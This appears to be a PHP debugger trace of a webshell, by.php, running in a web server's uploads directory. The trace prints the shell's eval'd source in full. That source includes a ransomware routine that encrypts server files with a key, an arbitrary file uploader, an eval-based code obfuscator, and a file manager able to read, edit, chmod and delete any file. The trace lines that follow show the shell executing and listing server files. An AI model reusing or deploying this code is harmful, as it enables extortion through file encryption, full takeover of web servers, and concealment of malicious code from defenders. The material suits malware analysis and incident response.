);\r\n\r\n $encrypted = base64_encode(\r\n $iv .\r\n mcrypt_encrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n $data,\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n )\r\n );\r\n if(file_put_contents($locate, $encrypted )){\r\n echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }else{\r\n echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> \'.$locate.\' <br>\';\r\n }\r\n }\r\n\r\n public function shcDeCry($key,$locate){\r\n $data = base64_decode( file_get_contents($locate) );\r\n $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));\r\n\r\n $decrypted = rtrim(\r\n mcrypt_decrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n ),\r\n "\\0"\r\n );\r\n if(file_put_contents($locate, $decrypted )){\r\n echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }else{\r\n echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }\r\n }\r\n\r\n\r\n\r\n public function kecuali($ext,$name){\r\n $re = "/({$name})/";\r\n preg_match($re, $ext, $matches);\r\n if($matches[1]){\r\n return false;\r\n }\r\n return true;\r\n }\r\n}\r\n\r\nif($_POST[\'submit\']){\r\nswitch ($_POST[\'method\']) {\r\n case \'1\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST[\'key\']);\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST[\'key\']);\r\n break;\r\n}\r\n}else{\r\n?>\r\n<center>\r\n<div style=\'font-size;color:red;\'>\r\n\r\n<pre>\r\n@@@@@ @@@@@ \r\n@@@@@@@ @@@@@@@\r\n@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@\r\n @@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@ \r\n @@@@@ @@@@@@@@@@@@@@@@@@@@@ @@@@@ \r\n @@@@@ @@@@@@@@@@@@@@@@@@@@@@@ @@@@@ \r\n @@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@ \r\n @@@@@@@ @@@@@@ @@@@@@ \r\n @@@@@@ @@@@ @@@@@ \r\n @@@@@@ @@@@ @@@@@ \r\n @@@@@@ @@@@@@ @@@@@ \r\n @@@@@@@@@@@ @@@@@@@@@@ \r\n @@@@@@@@@@ @@@@@@@@@ \r\n @@ @@@@@@@@@@@@@@@@@ @@ \r\n @@@@ @@@@ @ @ @ @ @@@@ @@@@ \r\n @@@@@ @@@ @ @ @ @ @@@ @@@@@ \r\n @@@@@ @@@@@@@@@@@@@ @@@@@ \r\n @@@@ @@@@@@@@@@@ @@@@ \r\n @@@@@ @@@@@@@ @@@@@ \r\n @@@@@@@ @@@@@@@ \r\n @@@@@ @@@@@ \r\n\r\n -[ Contact : HackerBaloch07@gmail.com ]-\r\n</pre>\r\n<form action="" method="post" style=" text-align: center;">\r\n <label>Key : </label>\r\n <input type="text" name="key" class="inpute" placeholder="Password Key">\r\n <select name="method" class="selecte">\r\n <option value="1">Locked</option>\r\n <option value="2">Unlocked</option>\r\n </select>\r\n <input type="submit" name="submit" class="submite" value="Submit" />\r\n</form>\r\n\r\n<?php\r\n}?>\r\n<br>\r\n\r\n<hr>\r\n\r\n<br><br>\r\n<h2><font color=\'red\' face = \'iceland\' > Uploader</h2> </font>\r\n<?php\r\n $files = @$_FILES["files"];\r\n if ($files["name"] != \'\') { \r\n $fullpath = $_REQUEST["path"] . $files["name"];\r\n if (move_uploaded_file($files[\'tmp_name\'],\r\n $fullpath)) {\r\n echo "<a href=\'$fullpath\' target=\'_blank\'>Akses\r\n untuk $fullpath</a>";\r\n } \r\n }echo \'<form method=POST\r\n enctype="multipart/form-data" action=""><input\r\n type="file" name="files"><input type=submit\r\n value="Fire!"></form></body></html>\';?>\r\n <br>\r\n </center>\r\n </div>\r\n</html>\r\n\r\n<!DOCTYPE html>\r\n<html lang="en">\r\n\t<head>\r\n\t\t\r\n\t\t\r\n\t\t<style>\r\n\tbody {\r\n\t\t\t\tbackground-color: black;\r\n\t\t\t}\r\n\t\t\tbody {\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\t\r\n\t\t\t\tbackground-color: black; \r\n\t\t\t}\r\ninput {\r\n\tcolor: red;\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\tborder: 2px solid red;\r\n border-radius: 4px;\r\n\t\t\t\tbackground-color: black; \r\n \r\n\r\n\r\n\r\n\r\n}\r\ntextarea {\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\tborder: 2px solid red;\r\n border-radius: 4px;\r\n\t\t\t\tbackground-color: black; \r\n\t\t\t}\r\n#content tr:hover{\r\n\t\t\t\t\t\t background-color: black;\r\n\t\t\t\t\t\t text-shadow:0px 0px 10px red;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t#content .first{\r\n\t\t\t\t\t\t background-color: black;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\ta{\r\n\t\t\t\t\t\t color: red;\r\n\t\t\t\t\t\t text-decoration: none;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t</style>\r\n\t</head>\r\n\r\n\t<body>\r\n\t\t<div class="heading">\r\n\t\t<font><center><h1>Php Obfuscator By 5H311_1NJ3C706</h1></center></font>\r\n\t\t</div>\r\n\t\t<div class="subheading">\r\n\t\t<center>\t<h3><font>paste your php code inside hit Enter done :P</font></h3></center>\r\n\t\t</div>\r\n\t\t<div class="input">\r\n\t\t\t<form action="" method="POST">\r\n\t\t\t<center>\t<textarea rows="9" cols="85" type="text" name="php" placeholder="Input Php Code Here"></textarea><br><br>\r\n\t\t\t\t</center>\r\n\t\t\t<center>\t<input type="submit" name="submit" value="Submit" /><br>\r\n\t\t\t\t</center>\r\n\t\t\t\t<?php\r\n\t\t\t\t\tif (isset($_POST[\'submit\'])) {\r\n\t\t\t\t\t$phpcode = $_POST[\'php\'];\r\n\t\t\t\t\t\tif (!empty($phpcode)) {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t$website = "http://".$_SERVER[\'HTTP_HOST\'];\r\n\t\t\t\t\t\t\t$file_location = htmlspecialchars($_SERVER[\'REQUEST_URI\']);\r\n\t\t\t\t\t\t\t$all_in_one = $website.$file_location;\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\r\n\t\t\t\t\t\t\t\t$obfuscate_high_level = strrev(base64_encode(gzdeflate(gzdeflate(gzdeflate(gzcompress(gzcompress($phpcode)))))));\r\n\t\t\t\t\t\t\t\t\t\techo \' <br><center><textarea rows="9" cols="85"> \r\n<?php\r\n/*\r\n\t\r\n\t\t\t\t\t\t CODE Successfully OBFUSCATED by 5H311_1NJ3C706 Obfuscator\r\n\t\t\t\t\t Strongest PHP obfuscator ;)\r\n\t\t\t\t\tDont change the variables othervise code will not work. \r\n If you are facing any problem contact me on Gmail. \r\n 5H311_1NJ3C706\r\n Or mail me Hackerbaloch07@gmail.com ;)\r\n*/\r\n$Cyber = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";\r\n$Crime = "\'.$obfuscate_high_level.\'";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($Cyber))));\r\nexit;\r\n?></textarea>\r\n\';\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t} \r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t?>\r\n\t\t\t</center>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div class="footer">\r\n\t\t\t\r\n\t\t</div>\r\n\t</body>\r\n</html>\r\n\r\n <?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href="" rel="stylesheet" type="text/css">\r\n<title>5H311_1NJ3C706</title>\r\n<style>\r\nbody{\r\nfont-family: "Courgette", cursive;\r\n\tbackground-image: url(" ");\r\n\tcolor:red;\r\n\tbackground-attachment:fixed;\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-position:center;\r\n\tbackground-color:Black;\r\n\t-webkit-background-size: 100% 100%;\r\n}\r\nh1{\r\ncolor:red;\r\n-webkit-text-stroke: 0px #5ddcfc;\r\n}\r\n#content tr:hover{\r\nbackground-color: #5ddcfc;\r\ntext-shadow:1px 1px 0px #000;\r\n}\r\n#content .first{\r\ncolor:red;\r\nbackground-color: #5ddcfc;\r\n}\r\ntable{\r\nborder: 0px #9435dd solid;\r\n}\r\na{\r\ncolor:red;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#9435dd;\r\ntext-shadow:0px 1px 0px #000;\r\n}\r\ninput,select,textarea{\r\nfont-family: Courgette;\r\nbackground-color:black;\r\ncolor:#5ddcfc;\r\nborder: 1px red solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<link href="https://fonts.googleapis.com/css?family=Courgette" rel="stylesheet">\r\n<center>\r\n<h1>CRACKER BY 5H311_1NJ3C706 </h1></center>\r\n<table width="700" border="0" cellpadding="4" cellspacing="1"align="center">\r\n<tr><td><font color="#5ddcfc">Current Dir :</font> \';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="#5ddcfc">Upload File Berhasil</font><br />\';\r\n}else{\r\necho \'<font color="#9435dd">Upload File Gagal</font><br/>\';\r\n}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\n<font color="#5ddcfc">File Upload :</font><input type="file" name="file" /><input type="submit" value="upload" />\r\n</form>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\' <center><textarea style="width: 700px;height: 300px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea></center>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="#5ddcfc">Change Permission Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Change Permission Gagal</font><br />\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="#5ddcfc">Berhasil Mengganti Nama</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Gagal Mengganti Nama</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNama Baru : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Simpan" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="#5ddcfc">Berhasil Edit File</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Gagal Edit File</font><br/>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<center><textarea style="width: 700px;height: 300px;" name="src"> \'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea></center><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Simpan" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br/><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<font color="#5ddcfc">Directory Berhasil Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Directory Gagal Terhapus </font><br/>\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<font color="#5ddcfc">File Berhasil Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">File Gagal Dihapus</font><br/>\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="700" border="0" cellpadding="4" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'<tr>\r\n<td><a href="?path=\'.$path.\'/\'.$dir.\'">\'.$dir.\'</a></td>\r\n<td><center>----</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'<font color=" #00edff">\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n</select>\r\n<input type="hidden" name="type" value="dir">\r\n<input type="hidden" name="name" value="\'.$dir.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'<tr>\r\n<td><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'">\'.$file.\'</a></td>\r\n<td><center>\'.$size.\'</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color=" #00edff">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n<option value="edit">Edit</option>\r\n</select>\r\n<input type="hidden" name="type" value="file">\r\n<input type="hidden" name="name" value="\'.$file.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<center><br/> </center>\r\n<center><font color="red" face="Courgette" size="4">Copyright © 2019 <font color="#9435dd">BLACK PHANTOM CYBER</font></center>\r\n<body>\r\n\t\r\n\t<iframe width="0" height="0" src="https://k.top4top.net/m_12407hbmd0.mp3" frameborder="0" allowfullscreen></iframe>\r\n\t\r\n</body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>' /var/www/html/uploads/by.php(10) : eval()'d code 1 0
4 16 0 0.004160 567784 error_reporting 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 38 1 0
4 16 1 0.004177 567824
4 16 R 22527
4 17 0 0.004191 567784 set_time_limit 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 39 1 0
4 17 1 0.004208 567848
4 17 R FALSE
4 18 0 0.004222 567816 ini_set 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 40 2 'memory_limit' '-1'
4 18 1 0.004238 567920
4 18 R '128M'
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 246 $files = NULL
4 19 0 0.004273 567928 error_reporting 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 380 1 0
4 19 1 0.004289 567968
4 19 R 0
4 20 0 0.004302 567928 set_time_limit 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 381 1 0
4 20 1 0.004317 567960
4 20 R FALSE
4 21 0 0.004330 567928 get_magic_quotes_gpc 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 383 0
4 21 1 0.004344 567928
4 21 R FALSE
4 22 0 0.004357 567928 getcwd 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 448 0
4 22 1 0.004372 567976
4 22 R '/var/www/html/uploads'
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 448 $path = '/var/www/html/uploads'
4 23 0 0.004399 567976 str_replace 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 450 3 '\\' '/' '/var/www/html/uploads'
4 23 1 0.004415 568072
4 23 R '/var/www/html/uploads'
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 450 $path = '/var/www/html/uploads'
4 24 0 0.004441 567976 explode 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 451 2 '/' '/var/www/html/uploads'
4 24 1 0.004457 568552
4 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 451 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 453 $id = 0
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 455 $a = TRUE
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 453 $id = 1
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 453 $id = 2
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 453 $id = 3
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 453 $id = 4
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 461 $i++
4 25 0 0.004720 568480 scandir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 551 1 '/var/www/html/uploads'
4 25 1 0.004753 569096
4 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'by.php', 4 => 'data', 5 => 'prepend.php']
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 551 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'by.php', 4 => 'data', 5 => 'prepend.php']
4 26 0 0.004793 569112 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.'
4 26 1 0.004811 569176
4 26 R TRUE
4 27 0 0.004825 569144 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/..'
4 27 1 0.004841 569192
4 27 R TRUE
4 28 0 0.004854 569152 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.htaccess'
4 28 1 0.004870 569192
4 28 R FALSE
4 29 0 0.004884 569152 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/by.php'
4 29 1 0.004899 569192
4 29 R FALSE
4 30 0 0.004912 569152 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/data'
4 30 1 0.004928 569192
4 30 R TRUE
4 31 0 0.004941 569152 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 566 1 '/var/www/html/uploads/data'
4 31 1 0.004959 569192
4 31 R TRUE
4 32 0 0.004973 569152 perms 1 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 568 1 '/var/www/html/uploads/data'
5 33 0 0.004987 569152 fileperms 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/data'
5 33 1 0.005001 569192
5 33 R 16895
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 16895
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 649 $info = 'd'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 677 $info .= 'w'
4 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x'
4 32 1 0.005137 569192
4 32 R 'drwxrwxrwx'
4 34 0 0.005151 569152 is_writable 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 569 1 '/var/www/html/uploads/data'
4 34 1 0.005168 569192
4 34 R TRUE
4 35 0 0.005183 569160 is_dir 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/prepend.php'
4 35 1 0.005199 569208
4 35 R FALSE
4 36 0 0.005213 569152 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.'
4 36 1 0.005228 569176
4 36 R FALSE
4 37 0 0.005242 569144 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/..'
4 37 1 0.005256 569192
4 37 R FALSE
4 38 0 0.005269 569152 is_file 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.htaccess'
4 38 1 0.005285 569192
4 38 R TRUE
4 39 0 0.005297 569152 filesize 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.005312 569192
4 39 R 64
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0625
4 40 0 0.005336 569096 round 0 /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0625 3
4 40 1 0.005351 569168
4 40 R 0.063
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.063
3 A /var/www/html/uploads/by.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.063 KB'
